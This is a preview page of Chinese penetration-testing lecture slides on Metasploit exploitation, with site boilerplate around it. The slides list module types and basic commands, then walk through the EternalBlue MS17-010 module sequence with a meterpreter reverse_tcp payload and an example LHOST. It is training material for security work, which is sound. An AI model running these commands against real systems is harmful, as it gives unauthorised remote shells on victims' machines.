第十課msf-漏洞利用_第1頁
第十課msf-漏洞利用_第2頁
第十課msf-漏洞利用_第3頁
第十課msf-漏洞利用_第4頁
第十課msf-漏洞利用_第5頁
已閱讀5頁,還剩11頁未讀 繼續免費閱讀

下載本文檔

版權說明:本文檔由用戶提供并上傳,收益歸屬內容提供方,若內容存在侵權,請進行舉報或認領

文檔簡介

1、 掌控安全 - Web安全微專業講師:阿蠻講師:阿蠻從Kali入門到玩轉黑客滲透工具 掌控安全學院小白的自我修養 一、戰前準備#環境的安裝及配置二、信息收集#外網入口點探測三、前端滲透#弱點擊破四、漏洞利用與提權工具五、神兵利器#MSF 等待開課等待其他同學入場(8.25-8.35) 8.35準時開講!歡迎聯系班主任微信:zkaqbanzhuren領取之前的課程回放 還有更多福利、活動及新課程的開課通知微信公眾號:掌控安全EDU今日課程:MSF-漏洞利用我的 微信號:zkaqbanzhurenMSF-基本模塊Auxiliary 輔助模塊 為滲透測試信息搜集提供了大量的輔助模塊支持Exploit

2、s攻擊模塊 利用發現的安全漏洞或配置弱點對遠程目標系統 進行攻擊,從而獲得對遠程目標系統訪問權的代碼組件。Payload攻擊載荷模塊 攻擊成功后促使靶機運行的一段植入代碼Post后滲透攻擊模塊 收集更多信息或進一步訪問被利用的目標系統Encoders 編碼模塊 將攻擊載荷進行編碼,來繞過防護軟件攔截MSF所用功能可分為這幾個模塊,每個模塊都有各自的功能領域MSF-基礎指令簡單好用的幫助指令help/? 幫助菜單exit退出msfBack 返回info顯示一個或者多個模塊的信息show顯示所給類型的模塊background 將當前操作在后臺運行use 選擇使用模塊sessions 查看會話msf

3、的套路掃描靶機 msf use auxiliary/scanner/smb/smb_ms17_010選擇exploituse exploit/windows/smb/ms17_010_eternalblue選擇payloadset payload windows/x64/meterpreter/reverse_tcp攻擊 run/exploit掃描靶機msf use auxiliary/scanner/smb/smb_ms17_010Required欄為yes,則Current Setting欄內的值需要進行設置 【+】表示有此漏洞選擇exploitmsf auxiliary(scanner/

4、smb/smb_ms17_010) use exploit/windows/smb/ms17_010_eternalblue模塊的基本設置options 顯示選項required 欄為yes ,則 current setting欄不能為空通常在exploit模塊中,我們需要設置靶機的地址,即RHOSTset RHOST 靶機地址查看payloads查看:show payloads設置payloadmsf exploit(windows/smb/ms17_010_eternalblue) set payload windows/x64/meterpreter/reverse_tcp模塊的基本設置通常在payload模塊中,我們需要設置本機的地址,即LHOSTset LHOST 192.168.139.137shell獲取屏幕截圖:meterpreterscreenshot獲取shell:meterpretersh

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯系上傳者。文件的所有權益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網頁內容里面會有圖紙預覽,若沒有圖紙預覽就沒有圖紙。
  • 4. 未經權益所有人同意不得將文件中的內容挪作商業或盈利用途。
  • 5. 人人文庫網僅提供信息存儲空間,僅對用戶上傳內容的表現方式做保護處理,對用戶上傳分享的文檔內容本身不做任何修改或編輯,并不能對任何下載內容負責。
  • 6. 下載文件中如有侵權或不適當內容,請與我們聯系,我們立即糾正。
  • 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。

評論

0/150

提交評論